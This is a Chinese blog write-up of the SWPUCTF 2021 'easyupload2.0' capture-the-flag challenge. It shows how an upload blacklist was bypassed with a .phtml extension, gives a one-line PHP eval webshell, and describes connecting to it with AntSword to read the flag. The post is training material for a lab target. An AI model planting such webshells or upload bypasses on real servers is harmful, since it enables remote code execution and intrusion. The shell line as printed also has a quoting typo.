[SWPUCTF 2021 新生赛]easyupload2.0(前端后缀过滤不完整+一句话木马+蚁剑)

已于 2024-07-07 20:53:17 修改
阅读量197 收藏 1
点赞数 1
文章标签: 前端
于 2024-07-06 18:34:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84499442/article/details/140233395
版权

首先看标签,明确方向,这是一个文件上传的题目。

看这里的upload1.jpg,首先我想到先用php配置文件修改jpg文件的属性,让服务器能够解析执行jpg文件.

但是似乎不可行

那就换扩展名

php行不通,那就继续换,经过实验,发现phtml和phtm没有过滤干净

哦,忘了,这里的一句话木马密码是a,之前忘记说了

一句话木马:

<?php

eval($_REQUEST['a]);

接下来使用蚁剑连接这个网址:http://node4.anna.nssctf.cn:28922/upload/1.phtml

后面的1.phtml是你上传的文件,然后找到flag.php

拿到flag

小吕要加油
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
L3+卡刷包.zip
02-28
标题中的“L3+卡刷包.zip”表明这是一个针对蚂L3+控制板的系统更新或恢复包,通常用于更新或修复控制板的固件。这类卡刷包一般包含一个镜像文件,用户可以通过烧录工具将其写入SD卡,然后插入控制板以进行系统升级...
前端css+html网页制作模板+毕业设计+9个首页的整站商品展示类
06-02
1、由于是英文网站,有的朋友下了某些HTML模板不知道怎么修改,可以百度...2.将cpx文件后缀名改为zip 3.解压zip到当前文件夹 4.打开谷歌浏览器扩展程序,点击"加载已解压的扩展程序",选择解压后的文件夹即可。
[SWPUCTF 2021 新生]easyupload2.0
qq_75120258的博客
03-04 473
显示php不行,上传jpg文件抓包,然后修改后缀为1.phtml,放包,上传成功,连接得到flag
NSSCTF | [SWPUCTF 2021 新生]easyupload2.0
最新发布
2302_80946742的博客
05-15 455
使用Burpsuite抓包只修改ContentType后发现也不能绕过,说明服务器使用了黑名单后缀限制,那么我们可以使用其他的后缀代替php,比如这里使用的phtml,ContentType改为image/jpeg,然后放行。cat命令查看flag.php的内容后发现不是正确的flag,看了别的师傅,原来flag在phpinfo中。与上面的绕过方法一致,传入phpinfo.php文件,然后访问搜索即可得到flag。测试成功,但是添加后无法查看目录,我不知道是为什么。可以看到回显,不允许上传php文件。
【CTF】[SWPUCTF 2021 新生]easyupload2.0
西原一点红的博客
06-20 415
响应直接访问,获得flag。
[SWPUCTF 2021]easyupload2.0(WP)
wikey 的博客
03-28 310
我们上传的php不行,百度知道可以用phtml代替php,那就在burp里面改一下就行。Content-Type还是改成image/jpeg。跟1.0版本差不多,用相同方法试试。
CY7C68013-128AC USB2.0最小系统开发板protel硬件原理图+PCB文件.zip
02-02
CY7C68013-128AC USB2.0最小系统开发板protel硬件原理图+PCB文件...Protel 99se 设计的DDB后缀项目工程文件,包括完整原理图及PCB印制板图,可用Protel或 Altium Designer(AD)软件打开或修改,可作为你产品设计的参考。
2020NYIST个人积分第四场(线段树+前缀 后缀乘积和)
01-03
题意: 给n个位置,q次操作,每次对操作可以改变i位置的数,定义f(i,j)=ai∗a(i+1)∗…∗aj.f(i,j) = ai * ...开一个结构体,每个节点带四个信息: struct node { int mul; 区间乘积 int qs; 前缀和 int hs; 后缀和 int
C++ 基于STL的演讲比管理系统 工程源码+详细注释
11-02
共两轮,第一轮为淘汰,第二轮为决。 ·比方式:分组比,每组6个人;选手每次要随机分组,进行比; ·每名选手都有对应的编号,如 10001 ~ 10012; ·第一轮分为两个小组,每组6个人。 整体按照选手...
nssctf web 入门(5)
qq_61988806的博客
04-17 807
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[SWPUCTF 2021 新生]第二波放题
weixin_63231007的博客
04-10 3791
[SWPUCTF 2021 新生]easyupload2.0 文件上传,抓包试一下 发现php不行。 和1.0一样,只不过不支持php,用phtml就行了 连接,在目录中找到flag。 知识点: 通常,在嵌入了php脚本的html中,使用 phtml作为后缀名; 完全是php写的,则使用php作为后缀名。 这两种文件,web服务器都会用php解释器进行解析。 [SWPUCTF 2021 新生]babyrce hackbar传入一个cookie:admin=1后,看见ra.
NSSCTF
weixin_43896504的博客
07-22 2520
NSSCTF
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8641
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
用python写一个批量修改文件名,不改变后缀,文件名是从指定数字开始+1
08-02
这段代码会从指定文件夹中找到所有文件,并将文件名修改为从指定数字开始的数字,不改变后缀。 ### 回答2: 要用Python写一个批量修改文件名的脚本,可以使用os模块和字符串处理的方法来实现。下面是一个示例代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值